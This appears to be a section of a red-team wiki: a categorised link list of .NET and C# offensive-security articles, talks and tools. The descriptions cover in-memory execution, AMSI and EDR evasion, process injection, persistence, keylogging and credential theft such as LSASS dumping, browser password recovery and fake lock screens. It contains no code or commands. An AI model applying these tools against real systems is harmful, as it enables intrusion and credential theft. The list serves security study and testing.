- Windows Script is a comprehensive scripting infrastructure for the Microsoft® Windows® platform. Windows Script provides two script engines, Visual Basic® Scripting Edition and Microsoft JScript®, which can be embedded into Windows Applications. It also provides an extensive array of supporting technologies that makes it easier for script users to script Windows applications.
- Articles/Blogposts/Writeups
-
Malicious Butler
-
The Remote Malicious Butler Did It! - Tal Be'ery, Chaim Hoch(BHUSA 2015)
- An Evil Maid attack is a security exploit that targets a computing device that has been left unattended. An evil maid attack is characterized by the attacker's ability to physically access the target multiple times without the owner's knowledge. On BlackHat Europe 2015, Ian Haken in his talk "Bypassing Local Windows Authentication to Defeat Full Disk Encryption" had demonstrated a smart Evil Maid attack which allows the attacker to bypass Bitlocker disk encryption in an enterprise's domain environment. The attacker can do so by connecting the unattended computer into a rogue Domain Controller and abusing a client side authentication vulnerability. As a result, Microsoft had released a patch to fix this vulnerability and mitigate the attack. While being a clever attack, the physical access requirement for the attack seems to be prohibitive and would prevent it from being used on most APT campaigns. As a result, defenders might not correctly prioritize the importance of patching it. In our talk, we reveal the "Remote Malicious Butler" attack, which shows how attackers can perform such an attack, remotely, to take a complete control over the remote computer. We will dive into the technical details of the attack including the rogue Domain Controller, the client-side vulnerability and the Kerberos authentication protocol network traffic that ties them. We would explore some other attack avenues, all leveraging on the rogue Domain Controller concept. We would conclude with the analysis of some practical generic detection and prevention methods against rogue Domain Controllers.
- Slides
C# & .NET Stuff
-
101
-
.NET & .NET Core
-
101
- Overview of .NET Framework - docs.ms
- Introduction to .NET Core - docs.ms
- .NET Core CLI overview - docs.ms
- .NET Standard - docs.ms
-
Tour of .NET - docs.ms
- This article offers a guided tour through some of the key features of .NET.
-
.NET architectural components - docs.ms
- A .NET app is developed for and runs in one or more implementations of .NET. Implementations of .NET include the .NET Framework, .NET Core, and Mono. There is an API specification common to all implementations of .NET that's called the .NET Standard. This article gives a brief introduction to each of these concepts.
- Common Language Runtime (CLR) overview - docs.ms
-
Application Domains
-
AppDomain Class - docs.ms
- Represents an application domain, which is an isolated environment where applications execute. This class cannot be inherited.
-
Internals
- Ninja Patching .NET - Jon McCoy(Dojocon2010)
- Hacking .NET Applications at Runtime: A Dynamic Attack - Jon McCoy(Defcon18)
-
Attacking .Net at Runtime - Jonathan McCoy(2013)
- This paper will introduce methodology for attacking .NET programs at runtime. This attack will grant control over the target's variables, core logic, and the GUI. This attack is implemented with .NET code, and is heavily based on reflection.
- .NET Method Internals - Common Intermediate Language (CIL) Basics - @mattifestation(2014)
-
Acquiring .NET Objects from the Managed Heap - Topher Timzen(2015)
- This paper will describe how to use any instantiated object in the .NET CLR managed heap as if it were declared locally. It will be shown that by referencing object pointers from the managed heap, an attacker can control objects being used in an application. Reflective techniques will be discussed and a signature will be introduced to find any object on the managed heap.
-
Attacking Microsoft’s .NET Framework Through CLR - Yu Hong, Shikang Xing(HITB2018AMS)
- In this talk, we first introduce the managed execution environment and managed code under .NET Framework and discuss the security weaknesses of this code execution method. After that, we show an exploit for SQL Server through CLR and our automated tools for this exploitation. We will introduce a backdoor with administrator privilege based on CLR hijacking arbitrary .NET Applications.
- .NET Malware Threat: Internals and Reversing - Alexandre Borges(Defcon2019)
-
Hijacking .NET to Defend PowerShell - Amanda Rosseau
- With the rise of attacks using PowerShell in recent months, there has not been a comprehensive solution for monitoring or prevention. Microsoft recently released the AMSI solution for PowerShell v5; however, this can also be bypassed. This paper focuses on repurposing various stealthy runtime .NET hijacking techniques implemented for PowerShell attacks for defensive monitoring of PowerShell. It begins with a brief introduction to .NET and PowerShell, followed by a deeper explanation of various attacker techniques, explained from the perspective of the defender, including assembly modification, class and method injection, compiler profiling, and C-based function hooking. Of the four attacker techniques that are repurposed for defensive real-time monitoring of PowerShell execution, intermediate language binary modification, JIT hooking, and machine code manipulation provide the best results for stealthy run-time interfaces for PowerShell scripting analysis.
-
Managed vs Unmanaged code
-
What is "managed code"? - docs.ms
- When working with .NET Framework, you will often encounter the term "managed code". This document will explain what this term means and additional information around it.
-
Papers
-
Reflection’s Hidden Power: “Modifying Programs at Run-Time”
- This paper will demonstrate using Reflection to take control over DotNet (.Net) compiled code. The focus of this paper will be on how to use Reflection to navigate and gain access to values and functionality that would normally be off limits. This paper will be geared for any DotNet programmer (focus will be in C#). No special knowledge of Reflection is necessary. The basic concept of Reflection and DotNet will be given, along with some light training on using reflection. This paper is written for the DotNet v2.0 and v3.5 versions of DotNet. Examples will be given on attacks, like forcing a program to change values and execute functionality.
-
ASM in .NET: The old is new again - Jon McCoy(2015)
- This paper will cover running raw Machine Code (ASM) from within .NET. As we all know, .NET runs on IL (Intermediate Language), also known as "Managed byte code". A program can declare an unsafe section of code and drop out from the managed area to run something like unmanaged C++ or the like. This paper will show how to run raw/unmanaged ASM in a normal safe C# application.
-
C#
-
101
-
A tour of the C# language - docs.ms
- C# (pronounced "See Sharp") is a modern, object-oriented, and type-safe programming language. C# has its roots in the C family of languages and will be immediately familiar to C, C++, Java, and JavaScript programmers. This tour provides an overview of the major components of the language in C# 8 and earlier.
-
Learning
- Get started with C# - docs.ms
-
Inside a C# program - docs.ms
- This section discusses the general structure of a C# program, and includes the standard "Hello, World!" example.
- C# 101 - Channel9 MSDN
- Reflection
-
Scripting/ClearScript
-
ClearScript
- A library for adding scripting to .NET applications. Supports V8 (Windows, Linux, macOS) and JScript/VBScript (Windows).
- ClearScript FAQtorial
- Cutting Edge : A Look at ClearScript - Dino Esposito(2014 docs.ms)
-
Detection
- Interesting DFIR traces of .NET CLR Usage Logs - MenaSec(2019)
-
Hijacking .NET to Defend PowerShell - Amanda Rosseau
- With the rise of attacks using PowerShell in recent months, there has not been a comprehensive solution for monitoring or prevention. Microsoft recently released the AMSI solution for PowerShell v5; however, this can also be bypassed. This paper focuses on repurposing various stealthy runtime .NET hijacking techniques implemented for PowerShell attacks for defensive monitoring of PowerShell. It begins with a brief introduction to .NET and PowerShell, followed by a deeper explanation of various attacker techniques, explained from the perspective of the defender, including assembly modification, class and method injection, compiler profiling, and C-based function hooking. Of the four attacker techniques that are repurposed for defensive real-time monitoring of PowerShell execution, intermediate language binary modification, JIT hooking, and machine code manipulation provide the best results for stealthy run-time interfaces for PowerShell scripting analysis.
- Informational
- Training
-
Discovery
-
Clipboard
-
Clippi-B
- Steals clipboard data. Written in C#, executable by Cobalt Strike or any other unmanaged CLR loader. You'll need the costura.fody NuGet package to compile. Targets .NET 4.0 or above, but is potentially backwards compatible with 3.5 if you use an older costura.fody NuGet (untested).
-
ActiveDirectory
-
Recon-AD
- As a proof of concept, we [OutflankNL] developed a C/C++ Active Directory reconnaissance tool based on ADSI and reflective DLLs which can be used within Cobalt Strike. The tool is called "Recon-AD" and at this moment consists of seven Reflective DLLs and a corresponding aggressor script. This tool should help you move away from PowerShell and .NET when enumerating Active Directory and help you stay under the radar of the latest monitoring and defense technologies being applied within modern environments.
- SharpView
-
Browser
-
SharpChromium
- SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta.
-
File Discovery/Hunting
-
SharpShares
- Enumerate all network shares in the current domain. Also, can resolve names to IP addresses.
-
SauronEye
- Search tool to find specific files containing specific words, i.e. files containing passwords.
- SharpFiles
-
SharpFinder
- Searches for files matching specific criteria on readable shares within the domain.
-
Network Services
-
SharpSSDP
- SSDP Service Discovery
-
Printers
-
SharpPrinter
- Printer is a modified and console version of ListNetworks
-
Screenshots
-
ScreenShooter
- C# program to take a full size screenshot of the window. Takes in 0 or 1 flag for a filename.
- Blogpost
-
Services
-
AtYourService
- C# .NET Assembly and python script for Service Enumeration. Queries all services on a host and filters out services running as LocalSystem, NT Authority\LocalService, and NT Authority\NetworkService
-
Situational Awareness
-
Reconerator
- This is a custom .NET assembly which will perform a number of situational awareness activities.
-
Scout
- Scout is a .NET assembly used to perform recon on hosts during a pentest. Specifically, this was created as a way to check a host before laterally moving to it.
-
SitRep
- SitRep is intended to provide a lightweight, extensible host triage alternative. Checks are loaded dynamically at runtime from stand-alone files. This allows operators to quickly modify existing checks, or add new checks as required.
-
SharpAppLocker
- C# port of the Get-AppLockerPolicy PS cmdlet
-
Seatbelt
- Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
-
HastySeries
- A C# toolset to support offensive operators to triage, assess and make intelligent decisions. Provides operators access to toolsets that can be integrated into other projects and workflows throughout a Red Team, Pentest or host investigation. We built this toolset over a period of a few days, hence the tool prefix of "Hasty".
-
User-Hunting
-
SharpSniper
- Find specific users in active directory via their username and logon IP address
-
Web
-
SharpWitness
- SharpWitness is my attempt at cobbling together a C# version of EyeWitness by Christopher Truncer. It still barely functions right now, but will hopefully become more useful once I put some dev time into it.
-
SharpFruit
- A C# penetration testing tool to discover low-hanging web fruit via web requests.
-
SharpShot
- Capture screenshots from .NET, using either native Windows APIs or .NET methods. Screenshots can be saved to disk using a randomly generated file name, or output to the console in base64 encoded form (does not touch disk).
-
Execution Tactics/Techniques
- 101
-
Articles/Blogposts/Writeups
- Create a Trimmed Self-Contained Single Executable in .NET Core 3.0 - talkingdotnet.com
- The 68 things the CLR does before executing a single line of your code - mattwarren.org
-
SharpNado - Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads - redxorblue
- SharpNado is a proof-of-concept tool that demonstrates how one could use .NET Remoting or Windows Communication Foundation (WCF) to host smarter and dynamic .NET payloads. SharpNado is not meant to be a fully functioning, robust payload delivery system, nor is it anything groundbreaking. It's merely something to get the creative juices flowing on how one could use these technologies or others to create dynamic and hopefully smarter payloads. I have provided a few simple examples of how this could be used to either dynamically execute base64 assemblies in memory or dynamically compile source code and execute it in memory. This, however, could be expanded upon to include different kinds of stagers, payloads, protocols, etc.
- Detecting and Advancing In-Memory .NET Tradecraft - Dominic Chell(2020)
-
Talks/Presentations/Videos
-
.NET Manifesto - Win Friends and Influence the Loader - Casey Smith(Derbycon2019)
- Everything you never wanted to know about .NET manifests and influencing binary loading. A growing number of security tools, both offensive and defensive, rely on the .NET Framework. This talk will focus on a narrow but important aspect. We will cover Application and Machine configuration files, as well as Registration-Free and Side-By-Side Assembly loading. What do all these have in common? Manifests. XML manifests can influence how the Operating System locates and executes binaries. We will explore additional concepts around influencing assembly loads. This talk will provide excellent insight into how these mechanisms work, how they can be subverted, and how they can be instrumented to aid defenders.
-
Staying # & Bringing Covert Injection Tradecraft to .NET - The Wover, Ruben Boonen(BlueHat IL 2020)
- As .NET has taken over as the preferred platform for development on Windows, many attackers have chosen to take advantage of its features for post-exploitation tradecraft. Legitimate APIs can be leveraged for nearly every imaginable task, managed code can be loaded and executed from memory with extraordinary ease, and scalable monitoring for suspicious usage of .NET APIs is a problem yet to be solved. However, offensive .NET tools are still hindered by a fundamental weakness: the inability to leverage unmanaged code (such as the Win32/NT APIs) safe from observation by EDR. Managed code must eventually invoke unmanaged code in order to interface with the operating system. It is here that the attacker may be caught in the hooks of any system keen on watching for fundamentally malicious behavior. To expose the depth of tradecraft still unexplored in .NET and highlight the fragility of many existing detections, we will detail the tools we have built for evading these hooks. All of our efforts have been integrated into SharpSploit, a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers. Over the past few months we have added numerous new tools and techniques for loading and executing unmanaged code safely from .NET. Unmanaged APIs may be safely accessed and modules loaded either from memory or from disk in the new DInvoke API, a dynamic replacement for .NET's PInvoke API. It also includes manual mapping, a generic syscall wrapper, a new technique we call Module Overloading, and more. Additionally, we have added a modular process injection API that allows tool developers to build their own injection technique. Simply select an allocation and injection primitive, pass in any options, and execute the result with your preferred payload. This exposes all possible design decisions to the user, and allows for easy adaptation when existing tools fail. 
In our talk we will focus on explaining the fundamental tradecraft behind these new developments, the challenges and requirements associated with them, and how they can be adapted to suit your needs. Additionally, we will discuss how SharpSploit can be combined with other open-source projects to be integrated into a red team's tooling. As much as possible, we will also discuss how to counter and detect the techniques that we have developed. Finally, we will explain the community-focused development of these projects and how you too can contribute to advance open-source .NET tradecraft.
- Papers
-
Tools
-
SharpGen
- SharpGen is a .NET Core console application that utilizes the Roslyn C# compiler to quickly cross-compile .NET Framework console applications or libraries.
-
SharpCompile
- SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in real time. This is a slicker approach than manually compiling a .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from ad hoc PowerShell execution by instead creating a temporary assembly and executing it using beacon's 'execute-assembly' in seconds.
-
NetLoader
- Loads any C# binary from filepath or url, patching AMSI and bypassing Windows Defender on runtime
-
AppDomainExample
- A .NET tool that uses AppDomains to enable dynamic execution and escape detection.
-
SharpAttack
- SharpAttack is a console for certain things I use often during security assessments. It leverages .NET and the Windows API to perform its work. It contains commands for domain enumeration, code execution, and other fun things.
-
PowerSharpPack
- Many useful offensive C# projects wrapped into PowerShell for easy usage.
-
peloader.cs
- This script loads a base64 encoded x64 PE file (e.g. Mimikatz or a Meterpreter) into memory and reflectively executes it.
-
RunSharp
- Simple program that allows you to run commands as another user without being prompted for their password. This is useful in cases where you don't always get feedback from a prompt, such as the case with some remote shells.
-
GrayFrost
- GrayFrost is a C++ DLL delivery system for C# payloads. Once compiled, GrayFrost can be injected into .NET applications using any DLL injection technique you wish!
-
Adversary Simulation
-
PurpleSharp
- PurpleSharp is a C# adversary simulation tool that executes adversary techniques with the purpose of generating attack telemetry in monitored Windows environments
-
Assemblies & AppDomains
-
101
-
Assemblies in .NET - docs.ms
- Assemblies form the fundamental units of deployment, version control, reuse, activation scoping, and security permissions for .NET-based applications. An assembly is a collection of types and resources that are built to work together and form a logical unit of functionality. Assemblies take the form of executable (.exe) or dynamic link library (.dll) files, and are the building blocks of .NET applications. They provide the common language runtime with the information it needs to be aware of type implementations.
- Strong-named assemblies - docs.ms
- Global Assembly Cache - docs.ms
- Working with Assemblies and the Global Assembly Cache - docs.ms
-
Application Domains and Assemblies How-to Topics - docs.ms
- The following sections contain links to all How-to topics found in the conceptual documentation for programming with application domains and assemblies.
-
Articles/Blogposts/Writeups
- Mixed Assemblies - Crafting Flexible C++ Reflective Stagers for .NET Assemblies - TheWover
- Linking dependencies together in C# - Jean Maes(2020)
- Jeffrey Richter: Excerpt #2 from CLR via C#, Third Edition - docs.ms
- .Net over .net – Breaking the Boundaries of the .Net Framework - Jim Shaver(2018)
- Shellcode: Loading .NET Assemblies From Memory(2019)
- Tools
-
Execution of
-
Articles/Blogposts/Writeups
-
RunDLL32 your .NET (AKA DLL exports from .NET) - Adam Chester
- In this post I wanted to look at a technique which is by no means new to .NET developers, but may prove useful to redteamers crafting their tools... exporting .NET static methods within a DLL... AKA using RunDLL32 to launch your .NET assembly.
- Running a .NET Assembly in Memory with Meterpreter - Thomas Hendrickson
- Shellcode: Loading .NET Assemblies From Memory - modexp
- Tools
-
DotNetToJScript
-
Articles/Blogposts/Writeups
- Executing C# Assemblies from Jscript and wscript with DotNetToJscript - @spottheplanet
- Advanced TTPs – DotNetToJScript (Part 1) - Jerry Odegaard(2020)
- Advanced TTPs – DotNetToJScript – Part 3 - Jerry Odegaard(2020)
- CSharp, DotNetToJScript, XSL - RastaMouse
- Extracting DotNetToJScript’s PE Files - Didier Stevens(2018)
-
Tools
-
DotNetToJScript
- This file is part of DotNetToJScript - A tool to generate a JScript which bootstraps an arbitrary .NET Assembly and class.
-
Inject-as-Shellcode
- Articles/Blogposts/Writeups
-
Tools
-
CLRVoyance
- CLRvoyance is a shellcode kit that supports bootstrapping managed assemblies into unmanaged (or managed) processes. It provides three different implementations of position independent shellcode for CLR hosting, as well as a generator script for quickly embedding a managed assembly in position independent shellcode.
-
Donut
- Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters
-
From Native Code
-
Tools
-
CLRHosting
- Library for reflectively loading .NET Assemblies using only the unmanaged CLR Hosting APIs provided by mscoree.dll. This imitates how the Windows Loader loads .NET EXEs and DLLS. This is the most OpSec friendly way to load Assemblies, since it is bootstrapped by an unmanaged executable (and is therefore harder to reverse) and does not use any .NET Framework libraries (such as System.Reflection). Because the result is an unmanaged PE-formatted EXE or DLL, the result may be injected into processes using standard process injection techniques. Therefore, managed Assemblies may be injected into unmanaged processes. Additionally, unmanaged on-disk stagers (written in C/C++) may be built that load .NET payloads (written in C#, etc.).
-
DotNetReflectiveLoading
- This project is the culmination of playing around with the native application CLR hosting APIs. It provides the ability to reflectively load and execute code from .NET assemblies, and will be a bit of an exploration of the COM and reflection facilities underpinning .NET on Windows.
-
AssemblyLoader
- Loads .NET Assembly Via CLR Loader
-
Donut
- "Donut contains a CLR Host loader that is converted to shellcode"
-
Binary/Source Obfuscation
-
AsStrongAsFuck
- A console obfuscator for .NET assemblies.
-
ConfuserEx2
- ConfuserEx 2 is an open-source protector for .NET applications. It is the successor of the Confuser project and the ConfuserEx project.
-
NeoConfuserEx
- Neo ConfuserEx is the successor of the ConfuserEx project, an open source C# obfuscator which uses its own fork of dnlib for assembly manipulation. Neo ConfuserEx handles most .NET apps, supports all eligible .NET Frameworks and provides decent obfuscation of your file.
- .NET Obfuscator Lists
- Lists of .NET Deobfuscator / Unpacker (Open Source)
-
MindLated
- .NET obfuscator
-
Cradles/Runners
-
SharpCradle
- SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.
-
RunShellcode
- Simple GUI program when you just want to run some shellcode.
-
CreateThread Example
- C# code to use CreateThread to run position independent code in the running process. This code is provided AS IS, and will not be supported.
-
CSharp SetThreadContext
- C# Shellcode Runner to execute shellcode via CreateRemoteThread and SetThreadContext to evade Get-InjectedThread
-
Language Embeds
-
Tools
-
Zolom
- C# Executable with embedded Python that can be used reflectively to run python code on systems without Python installed
- MSBuild-related
-
MS-SQL-related
-
Attacking SQL Server CLR Assemblies - Scott Sutherland
- During this webinar we’ll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence. Scott will also share a few PowerUpSQL functions that can be used to execute the CLR attacks on a larger scale in Active Directory environments.
-
Process Injection/Shellcode Execution
- Articles/Blogposts/Writeups
-
Tools
-
C# Memory Injection Examples
- A set of scripts that demonstrate how to perform memory injection.
-
Execute assembly via Meterpreter session
- Custom Metasploit post module to execute a .NET Assembly from a Meterpreter session
-
TikiTorch
- TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process, allocates a region of memory, then uses CreateRemoteThread to run the desired shellcode within that target process. Both the process and shellcode are specified by the user.
- TikiTorch - Rastamouse
- TikiVader - Rastamouse
- The Return of Aggressor - Rastamouse
- TikiService - Rastamouse
- Lighting the path through EDRs using TikiTorch - RhythmStick(2019)
-
MemorySharp
- MemorySharp is a C# based memory editing library targeting Windows applications, offering various functions to extract and inject data and codes into remote processes to allow interoperability.
-
ManagedInjection
- A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
-
SharpNeedle
- A project for properly injecting C# dlls into other processes.
-
ManagedInjection
- A proof of concept for injecting a pre-compiled .net assembly in memory at runtime with zero pre-knowledge of its assembly namespace or type. All that is necessary is a convention for the initial method name which will be instantiated, or just have the assembly initialize via its Constructor for a true "zero knowledge" scenario.
-
PS in C#
-
Articles/Blogposts/Writeups
-
Executing PowerShell scripts from C# - docs.ms(2014)
- "In today’s post, I will demonstrate the basics of how to execute PowerShell scripts and code from within a C#/.NET applications. I will walk through how to setup your project prerequisites, populate the pipeline with script code and parameters, perform synchronous and asynchronous execution, capture output, and leverage shared namespaces."
- Using C# for post-PowerShell attacks - John Bergbom(2018)
-
Tools
-
NoPowerShell
- NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used; only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll,main.
-
p0wnedShell
- PowerShell Runspace Post Exploitation Toolkit
- p0wnedLoader
-
Smallp0wnedShell
- Small modification version of PowerShell Runspace Post Exploitation Toolkit (p0wnedShell)
- CScriptShell
-
Stracciatella
- OpSec-safe PowerShell runspace from within C# (aka SharpPick) with AMSI, CLM and Script Block Logging disabled at startup
-
SpaceRunner
- This tool enables the compilation of a C# program that will execute arbitrary PowerShell code, without launching PowerShell processes through the use of runspace.
-
Reflection
-
Reflection (C#) - docs.ms
- Reflection provides objects (of type Type) that describe assemblies, modules, and types. You can use reflection to dynamically create an instance of a type, bind the type to an existing object, or get the type from an existing object and invoke its methods or access its fields and properties. If you are using attributes in your code, reflection enables you to access them. For more information, see Attributes.
- How C# Reflection Works With Code Examples - stackify
- Reflection in .NET - keesari_anjaiah(2010)
- What is Reflection in C#? - geeksforgeeks(2019)
-
Resource Embedding
- Single File Executable - https://docs.microsoft.com/en-us/dotnet/core/whats-new/dotnet-core-3-0#single-file-executables
- Assembly Linking - https://docs.microsoft.com/en-us/dotnet/core/whats-new/dotnet-core-3-0#assembly-linking
- https://denhamcoder.net/2018/08/25/embedding-net-assemblies-inside-net-assemblies/
-
Fody
- The Home repository is the starting point for people to learn about Fody, the project.
-
Fody Engine
- Extensible tool for weaving .net assemblies. Manipulating the IL of an assembly as part of a build requires a significant amount of plumbing code. This plumbing code involves knowledge of both the MSBuild and Visual Studio APIs. Fody attempts to eliminate that plumbing code through an extensible add-in model.
-
Costura
- Embed references as resources
-
Serialization
-
Gadget2Jscript
- GadgetToJScript - RastaMouse(2020)
- GadgetToJScript - 3gstudent
-
GadgetToJScript
- A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS based scripts. The gadget being used triggers a call to Assembly.Load when deserialized via JScript/VBScript, which means it can be used in the same way to trigger in-memory load of your own shellcode loader at runtime. Lastly, the tool was created mainly for automating WSH script weaponization for RT engagements (LT, Persistence, Initial Compromise); the shellcode loader which was used for the PoC is removed and replaced by an example assembly implemented in the "TestAssemblyLoader.cs" class for PoC purposes.
- GadgetToJScript, Covenant, Donut - 3xpl01tc0d3r
-
Tools
-
DotNetDeserializationScanner
- Scans for .NET Deserialization Bugs in .NET Assemblies
-
Windows Services
- Using Parameters With InstallUtil - ip3lee
-
SharpSC
- Simple .NET assembly to interact with services.
-
WinAPI Access
-
Articles/Blogposts/Writeups
- Offensive P/Invoke: Leveraging the Win32 API from Managed Code - Matt Hand
- Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge - Jack Halon(2020)
- Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge - Jack Halon
- Red Team Tactics: Utilizing Syscalls in C# - Writing The Code - Jack Halon
- SharpSploit.Execution.DynamicInvoke
-
Tools
- SysCallTables
-
ManagedWindows
- Managed wrappers around the Windows API and some Native API
-
SharpCall
- Simple proof of concept code that allows you to execute direct system calls in C# by utilizing unmanaged code to bypass EDR and API Hooking.
-
taskkill
- This is a reference example for how to call the Windows API to enumerate and kill a process similar to taskkill.exe. This is based on (incomplete) MSDN example code. Proof of concept or pattern only.
-
DnsCache
- This is a reference example for how to call the Windows API to enumerate cached DNS records in the Windows resolver. Proof of concept or pattern only.
-
Articles/Blogposts/Writeups
-
Payloads
-
SharPyShell
- tiny and obfuscated ASP.NET webshell for C# web applications
-
TCPRelayInjecter2
- Tool for injecting a "TCP Relay" managed assembly into an unmanaged process
-
Salsa Tools
- Salsa Tools is a collection of three different tools that, combined, allow you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written in C#. Salsa Tools was publicly released by Luis Vacas during his talk “Inmersión en la explotación tiene rima”, which took place during h-c0n on 9 February 2019.
-
CasperStager
- PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls.
-
Privilege Escalation
-
SharpExchangePriv
- A C# implementation of PrivExchange by @_dirkjan. Kudos to @g0ldenGunSec, as I relied on his code.
-
SharpUp
- SharpUp is a C# port of various PowerUp functionality. Currently, only the most common checks have been ported; no weaponization functions have yet been implemented.
-
Watson
- Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities
-
Net-GPPPassword
- .NET/C# implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
-
Collection
-
Sharp-Profit
- "Sharp-Profit is a C# version of my Profit script. This version can be utilized with Cobalt Strike's execute-assembly function."
-
Browser
-
FirePwd.Net
- FirePwd.Net is an open source tool written in C# to decrypt Mozilla stored passwords.
-
SharpWeb
- SharpWeb is a .NET 2.0 CLR compliant project that can retrieve saved logins from Google Chrome, Firefox, Internet Explorer and Microsoft Edge. In the future, this project will be expanded upon to retrieve Cookies and History items from these browsers.
-
File-Hunting
-
SharpSearch
- Search files for extensions as well as text within.
-
Monitoring
-
WireTap
- .NET 4.0 Project to interact with video, audio and keyboard hardware.
-
SharpLogger
- Keylogger written in C#
-
Privilege Escalation
-
Active Directory
-
Grouper2
- Find vulnerabilities in AD Group Policy
-
Registry
-
Reg1c1de: Windows Registry Privesc Scanner
- Reg1c1de is a tool that scans specified registry hives and reports on any keys where the user has write permissions. In addition, if any registry values are found that contain file paths with certain file extensions and they are writeable, these will be reported as well.
- Blogpost
-
Services
-
SneakyService
- A simple C# Windows service implementation that can be used to demonstrate privilege escalation from misconfigured Windows services.
-
Persistence
- Scheduled Tasks
-
General
-
SharpStay
- .NET project for installing Persistence
-
SharpHide
- Technique Whitepaper
- Just a nice persistence trick to confuse DFIR investigation. Uses NtSetValueKey native API to create a hidden (null terminated) registry key. This works by adding a null byte in front of the UNICODE_STRING key valuename.
-
Golden Tickets
-
GoldenTicket
- This .NET assembly is specifically designed for creating Golden Tickets. It has been built with a custom version of SharpSploit and an old 2.0 alpha (x64) version of Powerkatz.
-
Registry-related
-
Reg_Built
- C# Userland Registry RunKey persistence
-
Scheduled Tasks
- Articles/Blogposts/Writeups
-
Tools
-
Task Scheduler
- Provides a .NET wrapper for the Windows Task Scheduler. It aggregates the multiple versions, provides an editor and allows for localization.
-
Services
-
Unstoppable Service
- A pattern for a self-installing Windows service in C# with the unstoppable attributes.
-
Credential Attacks
-
Process Memory
- Writing Minidumps in C# - docs.ms
- Dumping Process Memory with Custom C# Code - 3xplo1tcod3r
-
SharpDump
- SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.
-
ATPMiniDump
- Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft.
- Blogpost
-
SafetyKatz
- SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.
-
KittyLitter
- This project was made for an upcoming event. It is comprised of two components, KittyLitter.exe and KittyScooper.exe. This will bind across TCP, SMB, and MailSlot channels to communicate credential material to lowest privilege attackers.
-
Clipboard
-
SharpClipboard
- C# Clipboard Monitor
- Blogpost
-
SharpClipHistory
- SharpClipHistory is a .NET application written in C# that can be used to read the contents of a user's clipboard history in Windows 10 starting from the 1809 Build.
-
Credentials on Disk/Stored in files
-
SharpCloud
- SharpCloud is a simple C# utility for checking for the existence of credential files related to Amazon Web Services, Microsoft Azure, and Google Compute.
-
DPAPI
-
SharpDPAPI
- SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.
-
Fake UI Prompt
-
Tools
-
SharpLocker
- SharpLocker helps get current user credentials by popping a fake Windows lock screen; all output is sent to the console, which works perfectly for Cobalt Strike. It is written in C# to allow for direct execution via memory injection using techniques such as execute-assembly found in Cobalt Strike or others; this method prevents the executable from ever touching disk. It is NOT intended to be compiled and run locally on a device.
-
Kerberos
-
Rubeus
- Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization; without their prior work this project would not exist.
- https://www.slideshare.net/aj0612/a-study-on-net-framework-for-red-team-part-i
-
LLMNR/NBNS Spoofing
-
InveighZero
- Windows C# LLMNR/mDNS/NBNS/DNS spoofer/man-in-the-middle tool
-
Multi-Tools
-
SafetyKatz
- SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.
-
Password Spray
-
SharpSpray
- SharpSpray is a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.
-
Proxy
-
FreshCookies
- C# .NET 3.5 tool that keeps proxy auth cookies fresh by maintaining a hidden IE process that navigates to your hosted auto-refresh page. Uses WMI event listeners to monitor for InstanceDeletionEvents of the Internet Explorer process, and starts a hidden IE process via COM object if no other IE processes are running.
-
Password Spraying
-
SharpDomainSpray
- SharpDomainSpray is a very simple password spraying tool written in .NET. It takes a password then finds users in the domain and attempts to authenticate to the domain with that given password.
-
RDP
-
RdpThief
- RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process, will perform API hooking, extract the clear-text credentials and save them to a file.
- Blogpost
-
SharpRDPCheck
- Used to check for valid Remote Desktop Protocol accounts (supports plaintext passwords and NTLM hashes)
-
Vault Credentials
-
SharpEdge
- C# Implementation of Get-VaultCredential - Get-VaultCredential enumerates and displays all credentials stored in the Windows vault. Web credentials, specifically are displayed in cleartext. This script was inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt
-
ActiveDirectory-related
-
ADFSpoof
- A python tool to forge AD FS security tokens. - Meant to be used with ADFSDump
-
ADFSDump
- ADFSDump is a tool that will read information from Active Directory and from the AD FS Configuration Database that is needed to generate forged security tokens. This information can then be fed into ADFSpoof to generate those tokens. - Meant to be used with ADFSpoof
-
SharpAdidnsdump
- C# implementation of Active Directory Integrated DNS dumping (authenticated user)
-
